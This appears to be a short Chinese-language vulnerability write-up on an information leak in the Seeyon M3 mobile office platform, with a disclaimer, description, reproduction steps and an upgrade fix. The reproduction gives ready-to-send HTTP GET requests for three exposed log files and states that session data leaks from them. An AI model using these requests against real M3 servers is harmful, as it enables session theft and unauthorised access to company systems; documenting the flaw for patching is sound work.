文章目录
- 免责
- 漏洞描述
- 漏洞原理
- 影响版本
- 漏洞复现
- 修复方法
免责
只为学习与交流,若利用做一切违法乱纪的事与本人无关
漏洞描述
致远M3是一个企业移动业务管理平台,全面覆盖各种工作场景,通过智能化的办公和业务场景融合,为企业构建新一代的移动智能工作方式
漏洞原理
/mobile_portal/logs/autoLogin.log
/mobile_portal/logs/app.log
/mobile_portal/logs/requset.log
接口处存在存在信息泄露
影响版本
不详
漏洞复现
进行访问泄露接口
GET /mobile_portal/logs/autoLogin.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
可以看到session泄露
GET /mobile_portal/logs/app.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
GET /mobile_portal/logs/requset.log HTTP/1.1
Host: xxxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Content-Length: 2
修复方法
官方已更新补丁,请升级至最新版本。
)
是什么?)
